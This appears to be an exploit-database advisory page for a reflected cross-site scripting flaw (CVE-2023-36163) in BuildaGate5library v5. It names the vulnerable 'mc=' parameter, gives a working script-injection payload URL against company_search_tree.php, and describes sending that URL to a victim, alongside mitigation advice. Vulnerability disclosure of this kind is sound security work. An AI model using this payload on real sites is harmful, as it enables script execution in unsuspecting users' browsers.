header-logo
Suggest Exploit
vendor:
BuildaGate5library
by:
Idan Malihi
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: BuildaGate5library
Affected Version From: 5
Affected Version To: 5
Patch Exists: NO
Related CWE: CVE-2023-36163
CPE: a:buildagate5library:buildagate5library:5
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 10 Pro
2023

BuildaGate5library v5 – Reflected Cross-Site Scripting (XSS)

An attacker can inject malicious JavaScript code through the vulnerable parameter (mc=) in the URL. This can lead to execution of arbitrary code in the victim's browser.

Mitigation:

The vendor should sanitize user input and encode special characters to prevent XSS attacks. Additionally, input validation and output encoding should be implemented.
Source

Exploit-DB raw data:

# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

Navigation

Suggest Exploit

Services By CQR